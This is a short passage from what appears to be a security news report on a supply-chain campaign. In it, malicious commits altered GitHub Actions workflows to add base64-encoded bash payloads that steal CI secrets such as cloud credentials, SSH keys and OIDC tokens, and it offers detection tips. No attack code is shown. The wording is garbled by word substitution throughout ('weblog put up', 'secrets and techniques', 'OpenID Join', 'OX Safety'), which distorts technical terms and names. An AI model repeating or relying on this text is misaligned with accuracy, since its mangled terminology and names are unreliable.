Sudden workflow_dispatch runs within the Actions tab might be a warning signal, the researchers mentioned in a weblog put up. “For those who use OIDC federation for cloud deployments, overview cloud audit logs for token requests from unknown workflow runs.”
The malicious commits had been seen modifying Github Actions workflows to incorporate base64-encoded bash payloads designed to steal secrets and techniques uncovered throughout CI execution, together with cloud credentials, SSH keys, OpenID Join (OIDC) tokens, supply code secrets and techniques, and different atmosphere variables.
Among the many hardest-hit initiatives had been Wiznet’s ioLibrary_Driver repository, 4 Tiledesk repositories, and 4 persian-tools repositories, with nicely over 2,000 malicious commits between them.
A later weblog put up by OX Safety flagged some similarities to the widespread TeamPCP compromises, significantly using hardcoded historic commit dates. This was a trick utilized in TeamPCP-linked operations to cover the true timing of malicious exercise.
